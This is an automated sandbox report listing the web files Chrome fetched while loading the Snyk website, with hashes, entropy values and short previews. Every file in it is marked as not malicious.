                                                                                                                                                                                                                                                                                                              Preview:<svg width="140" height="48" viewBox="0 0 140 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_1_23)">.<path d="M125.884 19.5621C127.561 19.5621 128.92 18.2031 128.92 16.5268C128.92 14.8505 127.561 13.4915 125.884 13.4915C124.208 13.4915 122.849 14.8505 122.849 16.5268C122.849 18.2031 124.208 19.5621 125.884 19.5621Z" fill="#FF4500"/>.<path d="M82.5332 29.4691C84.0223 29.4691 84.881 28.3525 84.8239 27.2642C84.7956 26.6916 84.738 26.319 84.6809 26.0329C83.7645 22.0818 80.5579 19.1607 76.7492 19.1607C72.2254 19.1607 68.5603 23.2554 68.5603 28.2949C68.5603 33.3343 72.2254 37.429 76.7492 37.429C79.5844 37.429 81.6173 36.3984 83.0776 34.7663C83.7933 33.9646 83.6503 32.7333 82.791 32.1318C82.0753 31.6451 81.1877 31.8169 80.5291 32.3608C79.8993 32.9052 78.6968 33.9929 76.7492 33.9929C74.459 33.9929 72.512 32.0171 72.0823 29.4114H82.5332V29.4691ZM76.7209 22.6257C78.7822 22.6257 80.5579 24.229 81.2165 26.4338H72.2254C72.884 24.2007 74.6592 22.6257 76.7209 22.6257ZM68
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (1551), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1551
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.163322668831666
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:0E01AZ14iwMsom6Zy0zZv9Qxlz/sJ5u/sRxQ75jmlZ1X5E1d1I:0EG+1py0zZvKxiTvQ7Rmh
                                                                                                                                                                                                                                                                                                              MD5:323CF43FB7DD4D8CE2FBF72604328721
                                                                                                                                                                                                                                                                                                              SHA1:56C258DE4E028E0AEF4692678B0068E09AE8331D
                                                                                                                                                                                                                                                                                                              SHA-256:6AB118C2209E402251F0B889442DC77AEBB5F45444A9343C9025CE7CE1D0CEC1
                                                                                                                                                                                                                                                                                                              SHA-512:708AF711CD696CFF96BD5486A478022737B1E63A6004C104AED8A1D3BAEBCAF4ABD65BC9944B2DD3A6B3D1AC975FC2988309DE51026C5F0BB23E7413B4F2ED85
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1729799362127
                                                                                                                                                                                                                                                                                                              Preview:<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><link rel="manifest" href="/core/manifest.json"><link rel="dns-prefetch" href="https://js.driftt.com" crossorigin><link rel="dns-prefetch" href="https://customer.api.drift.com" crossorigin><link rel="dns-prefetch" href="https://conversation.api.drift.com" crossorigin><link rel="dns-prefetch" href="https://targeting.api.drift.com" crossorigin><link rel="dns-prefetch" href="https://metrics.api.drift.com" crossorigin><title>Drift Widget</title><script type="text/javascript">__ENV__="PRODUCTION",__BUILD_ID__="20241011172359-6acc819",__REGION__=window.location.search.match("[\\?&]region=([^&#]*)")?window.location.search.match("[\\?&]region=([^&#]*)")[1]:"US"</script><link rel="preload" href="/core/assets/js/runtime~main.ca4e7fb9.js" as="script" crossorigin="anonymous"><link rel="preload" href="/core/assets/j
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (41169)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41172
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.505998162296305
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:j21xCdwV69Odf9dk1fV8iWUwcb9x8cvgBhpU9yC8IEVDlbth3Ia8DdEN:iP3kr8V8vShi98Iiph3IbC
                                                                                                                                                                                                                                                                                                              MD5:0AA5002702487976D570A640C408EBA5
                                                                                                                                                                                                                                                                                                              SHA1:48930F22A2396DF313CCDFCB91CAC20E38F2B06B
                                                                                                                                                                                                                                                                                                              SHA-256:4E8276AEA0A3C7FE3600E6718C7F484D49C347C8D5763D89BE95900D526A14DA
                                                                                                                                                                                                                                                                                                              SHA-512:37A9D609DB21EE1E696CB437C02F0F6410925EB10B6353C0CDF95DB265E342F0BC3D2AE1851D209E4517D978B7CCBE8AD56F98247FA865AE405FAFD4D2E62CDA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3969)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):285108
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.560989255217787
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:5jRhbIGc3kWhrT1Zc0mSJcEjCPfrgixeOYH2hnHwCFrOXk9n9tjG:NRo3k4rJFvvioX5CFqXk9n9tq
                                                                                                                                                                                                                                                                                                              MD5:E22E4D47970799D8F297BCE33FBFE2E6
                                                                                                                                                                                                                                                                                                              SHA1:808835563FC12D87A2514EC403DD493C37C25B41
                                                                                                                                                                                                                                                                                                              SHA-256:5093221881506F769DFC94678AA4C5A811B228D8CA12DCDEC8E768E1CF074320
                                                                                                                                                                                                                                                                                                              SHA-512:90B1FC1206F4469B3A6AEDDBC1EDD48A256296764F30AA008B592623036C379A52CA0B315571EB0B662D9C9C2E17A7BE8DBD22CD2DC9F939F905CAC1DA76949B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-923832244","tag_id":16},{"function":"__ogt_cps","priority":6,"vtp_cpsAds":true,"vtp_cpsPlaystore":true,"vtp_cpsYoutube":true,"vtp_cpsSearch":true,"vtp_cpsMode":"SOME","vtp_cpsShopping":true,"vtp_cpsMaps":true,"tag_id":8},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_au
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (10517), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):10517
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.436701020601256
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:ofK7LwQ0LjUgZOOSqIw5dxQNEGSk37vldT+/6cMpc6:oi7LwQ6jxsOSqXhQMwT+/Hf6
                                                                                                                                                                                                                                                                                                              MD5:CB1FBD4EA4275B0C84DD670691F52CA0
                                                                                                                                                                                                                                                                                                              SHA1:78609A3F5E4F25BDB34CEE98E4788F3E6504018C
                                                                                                                                                                                                                                                                                                              SHA-256:69D6CB2AB72FA0DE0D66E9B4084DB0E538D4160D4DB5041914AF401ECE1E777D
                                                                                                                                                                                                                                                                                                              SHA-512:33D85D6317C3C4E400E9581DA88121CAA62532C3A5340B8C2751FE7C15C8D9C129648A826097F701636B3D810C9AAA01CF4805617EC41660A9ADC5D839E99EFB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/9253-7607d51456dc87b7.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9253],{24881:function(e,l,n){n.d(l,{Z:function(){return i}});function i(e){let{url:l="/",locale:n="",basePath:i="",slug:d=""}=e;return[l,"en-US"===n?null:n,i,d.replace(/^\/|\/$/g,"")].filter(Boolean).join("/").replace(/\/?$/,"/")}},3770:function(e,l,n){n.d(l,{Z:function(){return t}});var i=n(85893),d=n(2962),a={src:"/_next/static/media/default-snyk.8953a9bd.jpg"};function o(e){var l,n,o,t,r,u,s,b,c,v,p,m,g,h,G,w,k,f,y,C,x,P,T,S,j,A,F,_,B,L,Z,E,M;let{data:N,locale:U,hrefLangs:I,contentTags:R,ogArticleObject:D,fallbacks:$,force:q,...z}=e,O=/\| Snyk$/,W=e=>O.test(e)?e:e+=" | Snyk",Q=(null==q?void 0:q.noIndex)||(null==N?void 0:N.no_index),V=[...(null==R?void 0:null===(l=R.fields)||void 0===l?void 0:l.audience)?null==R?void 0:null===(n=R.fields)||void 0===n?void 0:n.audience:[],...(null==R?void 0:null===(o=R.fields)||void 0===o?void 0:o.contributor)?null==R?void 0:null===(t=R.fields)||void 0===t?void 0:t.contributor:[],..
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65531), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):76676
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.13726611752675
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:hHCpu9A4/1236nD36YD36JTzZI0Y37tts1j+CWSxFxrjJkF1EMVvpxl+fm9re9P3:hHZS4/1a6nz6Yz67Ik1dWIkF5Xr9faMe
                                                                                                                                                                                                                                                                                                              MD5:768A6856ED55B4CF6B0627BF177BF4D3
                                                                                                                                                                                                                                                                                                              SHA1:692416653C9791D7CFFB62B26B544B200DF570B6
                                                                                                                                                                                                                                                                                                              SHA-256:183DCC30375EABFE0C2152B5AE73587E7CC10575944910F0FA8493427CF27D76
                                                                                                                                                                                                                                                                                                              SHA-512:8ECF387ACA3296CF331CDD07493BDE35236D160E70573F82541CC4E7CED48BB75DE40CD51CDDEEFE00DC224597ABFAB3BB8D1CAEB2933B345DD1634B21E1A765
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/infrastructure-as-code-security.json?slug=product&slug=infrastructure-as-code-security
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2i6WdLdRYeDA5iO4KJAKMb","type":"Entry","createdAt":"2022-10-21T05:28:23.507Z","updatedAt":"2024-07-26T13:15:53.911Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":73,"revision":12,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Products - Snyk IaC","title":"Infrastructure as Code Security | IaC Security | Snyk","slug":"infrastructure-as-code-security","uri":"product/infrastructure-as-code-security","pageLocalization":["de","fr","ja","pt-BR"],"contentTags":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4pFhP7cfzo00Fs1PADSIHP","type":"Entry","createdAt":"2022-10-21T05:28:23.622Z","updatedAt":"2023-05-25T20:47:43.455Z","environment":{"sys":{"id"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6607), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):6607
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.018308856351984
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:wAe0cFG+fLNsl3FsJ9CDIUDL+11tpY916yqXFqyI7x7Suh1wWHMDq/lfK:wAepFGwLNsqCfXS1tbqXl/HjlfK
                                                                                                                                                                                                                                                                                                              MD5:48CCB4D22AF598DB5F6D9A2C4497B92D
                                                                                                                                                                                                                                                                                                              SHA1:58F5D599519930B88C39905DC5D73137585312FC
                                                                                                                                                                                                                                                                                                              SHA-256:A41D84A4C123569C9259EC53BA89E713610AB0C6993F2F829E4DCB3127364210
                                                                                                                                                                                                                                                                                                              SHA-512:972CE378B4E0CDC353C93527A34045DE792735DDBD3BE2D1ED5C18488B861D99D718588905FD19F007986C1F1F204BFD46BEA6F3BB217D62E2C01C09C1F4C052
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/Cp4abAN54CGUdTYwS0J62/_buildManifest.js
                                                                                                                                                                                                                                                                                                              Preview:self.__BUILD_MANIFEST=function(s,e,a,t,c,i,p,l,u,r){return{__rewrites:{afterFiles:[],beforeFiles:[],fallback:[]},"/":[s,e,a,"static/chunks/pages/index-e37833ce18fb9437.js"],"/404":[s,e,"static/chunks/pages/404-8e721a38ad5c42f6.js"],"/_error":["static/chunks/pages/_error-26a0cbf711b7e18d.js"],"/appsecmap/share":[s,t,e,"static/chunks/3863-dacde48688610dd3.js","static/chunks/pages/appsecmap/share-903ea8672d42f541.js"],"/articles":[s,t,e,a,c,"static/chunks/pages/articles-5523879d08b6c03c.js"],"/articles/[...slug]":[s,i,e,p,l,"static/chunks/pages/articles/[...slug]-59943cfdb1f546ce.js"],"/blog":[s,t,e,a,c,"static/chunks/pages/blog-83e44d3a936c8c92.js"],"/blog/feed":["static/chunks/pages/blog/feed-16f38758f2dfa9c4.js"],"/blog/[slug]":[s,i,e,p,l,"static/chunks/pages/blog/[slug]-8aaf7f01683efd16.js"],"/case-studies":[s,e,a,c,"static/chunks/pages/case-studies-b5ee76f1d0f37892.js"],"/case-studies/[slug]":[s,e,"static/chunks/pages/case-studies/[slug]-292f1412799965b1.js"],"/code-checker":[s,e,a,"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                              MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                              SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                              SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                              SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://td.doubleclick.net/td/rul/923832244?random=1729799399572&cv=11&fst=1729799399572&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4al0v9101588801z89131853231za201zb9131853231&gcd=13r3r3r3r5l1&dma=0&tag_exp=101533422~101686685~101794737~101823847&u_w=1280&u_h=1024&url=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&hn=www.googleadservices.com&frm=0&tiba=See%20Snyk%20in%20action%20-%20Book%20a%20live%20demo%20%7C%20Snyk&did=dOThhZD&gdid=dOThhZD&npa=0&us_privacy=1YNY&pscdl=noapi&auid=1154500146.1729799382&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse
                                                                                                                                                                                                                                                                                                              Preview:<html></html>
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 11 tables, 1st "OS/2", 14 names, Macintosh, type 1 string, brandui-icons
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):21396
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.3245362907503395
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:Y4isyAGmek8e9tN20Ynioc4WpJK0PHO9Dy9l16R0uSJR3+ysqmSUcwat4crdEWKt:Y4ivAGmeXCtN21n7c48K0uBy9l1WqR3w
                                                                                                                                                                                                                                                                                                              MD5:22761E6C7A20E60C366503C80D678F4B
                                                                                                                                                                                                                                                                                                              SHA1:BE9BDE8FD25BCFB477EFB9BDD66DE0EE29E087C7
                                                                                                                                                                                                                                                                                                              SHA-256:2E0B1745571F9584E42C908726D92E74C97109B54D7E1F567333283A1C4127B4
                                                                                                                                                                                                                                                                                                              SHA-512:9B0E8A9507407918516FF3B6466D38723F94A32EF2051B6C34C72E2B235B111010D93B8A8206A6ACF7DFD609AB7B6E4A1AAF11289BC764923F3D6C3CBC93FB15
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/raw/upload/snyk-mktg-brandui/icons-font/brandui-icons.ttf?v=1.0.3
                                                                                                                                                                                                                                                                                                              Preview:...........0OS/2...........`cmap.V.........Tgasp.......p....glyf.......x..M.head)l.H..N....6hhea...+..N....$hmtx......N.....loca......P.....maxp.{.K..Q.... name...~..Q.....post......St... ...........................3...................................@...k.....@...@............... .................................8............. .k......... ................................................79..................79..................79.................).L.X.d..."............327>.7654'..'&#.>.32....#"&'%&'..'&#"........547>.7632.........."....32654&."&54632......XNNt!""!tNNXXNNt!""!tNNX...<<..+k<<k+...$%N%%..%%N%$.!%..]>>GG>>]..%!..>WW>>WW>.%%..%%.k"!tNNXXNNt!""!tNNXXNNt!".I.//.#&&#>............+i:G>>]....]>>G:i+..W>>XX>>W.%..&&..%................(..."............327>.7654'..'&#.#.#5#5353.3..XNNt!""!tNNXXNNt!""!tNNX.V..V..k"!tNNXXNNt!""!tNNXXNNt!".*..V..............#./.z.......'..#"................3267>.7>.7>.'..#"&54632.."..............65..'4&'&'..'&567>.7672.....................767>.7654'..
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, was "tmpCfWGAE", last modified: Fri May 8 09:06:08 2020, max compression, original size modulo 2^32 489
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):522
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.343516125324942
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:XJjUv/7Cu7oXqejoa3pS/3vgOGUBbxMFHCKlHIEg3JzWiFlpij:XthXqe3ZS/3IFSbxMFHnXuzRjij
                                                                                                                                                                                                                                                                                                              MD5:3702ADA73B8951017B8451CBD6A96523
                                                                                                                                                                                                                                                                                                              SHA1:FBA130B6F83751655F96DF7F947B9591DA67C50B
                                                                                                                                                                                                                                                                                                              SHA-256:A714DEF57C786512C5F2BA2CC4DFA9EFE919CD5F2004D05378D5BE2377F627EF
                                                                                                                                                                                                                                                                                                              SHA-512:574EE82DDDD8DBCD580883CC3D5F792A9DDABAB2C9651BF262276A0FB05FDE6F6E6C12EAC71381C2613891758459A5EFA0CFA3679049C5A738F6149074162A28
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:.....!.^..tmpCfWGAE.......PNG........IHDR....................iCCPsRGB IEC61966-2.1..(.u..+DQ..?f..G....IX!F..2...4F...y.fF..{o.d.l.(..k._.VY+E.deaMl......s>.{.9.{...)%mT.C:c.....}....(.....gg..8>..M.]...G}L5.....).n.O.O......J2..>.......u...._6..P.\..../..b%.....t.S9.t..%.jf~Nb.X;.!...2.....`D...........g.J."^#..*..........y....j..}N..?.<Y.[..nA.`Y...U<..#\d.....~..P.:..i....Zt..7..A....-..............9...|....A..oZ....g...`h....pHYs...#...#.x.?v....IDAT..c````........N.....IEND.B`....f....
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 960 x 614, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):68432
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.960303353197491
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:8p2QkcSpGgxG3Yr5hOpZDczED3MN7vgRLMx815+cO:8p2IlgYorXUozEDAPx8j+n
                                                                                                                                                                                                                                                                                                              MD5:78A3A3F9963F9DFF561D1208C0DF5534
                                                                                                                                                                                                                                                                                                              SHA1:3182FE2EDEE1245C4183A1FCC46DF36AB0B4BE8D
                                                                                                                                                                                                                                                                                                              SHA-256:DE86F4890662FD7648E7F46561BEE546D8A70771D449950561EED363101E20EC
                                                                                                                                                                                                                                                                                                              SHA-512:729DA280AFDA79DEF5F4EAD1ECAC190CBEE8BD4EDDF6588540CCE23E20AC7FF9A2E6F28FECFDEB27D4789770886F2E4BCD827680F9E38FBFAF96D86EC1A524D5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.......f......:......PLTELiq.vz.vqI..MSl05n#...(.?Cr.d'..................N...w.sy..W.....kz!s.0......>....8...gx...9.....,..4..}9...(..?......gp16....9...e...~;....[....l.....Q/..Xt#}.;.....Y/..d.&....S6.>.....%...|p....Q..aw....f|*...hM.......,..E..iw.B.....6.......0....c5..y...d..b.......<...n.>....&..0.....\.^)......B...[..I..^.9.....v=.....j....%..d..j....K).R6.&..c..h..>...Q...SW..q........c,............b.......P5...U.r..]....hu.w..b.........(R5.G3.M4.]8.X6... B2.v=.1..%+.7/.=1.+-..*.o<.}?.c9..A.i:..(..w..D..}......]...0._.P.q3.*...J..D....g...}n0....A.n.$..!.7d/M.BRR&Ju9OA.E[(.1.>..Q7....H.N.z:...X.MS?...P.WU.W.aTO!..t..._..h.$.r.kS.tQd<..o....G.J/.~..3&.c6..{h.......f|;"t....W.....K.cg.AZ.Bn.8KDGm diE~...ta1g.2......r.?f....tRNS.........!...zl..&.....3....-..R^...6.A.9$(...i.K.O.6...>iok^L.rhJ.$X.e....X.....................q....5.O............x.........k....................................
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):96
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.049544892218474
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:iumybiC0KsKsfA6Yh0hQOQNVDPS2hnkOicUn:NmybipxYymOQNVDql6Un
                                                                                                                                                                                                                                                                                                              MD5:98097533ACA076C1C83F42019969BEAC
                                                                                                                                                                                                                                                                                                              SHA1:FA6814094836D7F222F7BD41259D654B50494CAE
                                                                                                                                                                                                                                                                                                              SHA-256:D400EF9CDB717F7204A0F768E39C98A5A235182C03DEAD049C5941F03B3A44E4
                                                                                                                                                                                                                                                                                                              SHA-512:F7B04B0473D018A4D6F24497C012F0A2CFC705E6FFA6909C2ABFDA35C1DF6BC58C59A7C6ABE5ECB9EFCBADC7F6915A209BD1B35CF80DEF2EF0B8F71AA2074F3B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISMwnuIhmrY4EH7RIFDQ-obAwSBQ38jPmlEgUNNv6k5RIFDUjR-e0SBQ2a-rSTEgUNsuxnZA==?alt=proto
                                                                                                                                                                                                                                                                                                              Preview:CkYKCw0PqGwMGgQICRgBCgsN/Iz5pRoECAMYAQoLDTb+pOUaBAgFGAEKBw1I0fntGgAKBw2a+rSTGgAKCw2y7GdkGgQIDRgB
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4500
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.978943808794042
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:WNQdyfE+0X727zlk/7HuIxzHRmFEt0fu2YSoyIFSk:WNQdKEXXck/7HDZHIFEGfu2YSoJ
                                                                                                                                                                                                                                                                                                              MD5:8499C8E5F2C80A427F7695ACD9D4BCF9
                                                                                                                                                                                                                                                                                                              SHA1:64537A002BC1D700B3237856E3DD9A6A261C3C21
                                                                                                                                                                                                                                                                                                              SHA-256:C0E57C534E7FCE5E66FB419C269B97D436385A2C69B9F508EDF480EF60DEDF91
                                                                                                                                                                                                                                                                                                              SHA-512:C515A06EA4CB2FDAA9A0F65FF3E29E19E25782794EB80B5B23762BFB94712EB3C8E5DF3F1321E4DEC7DF218E803AC8DC295D7D01873A57B1E85B7DDCEC00A1CF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
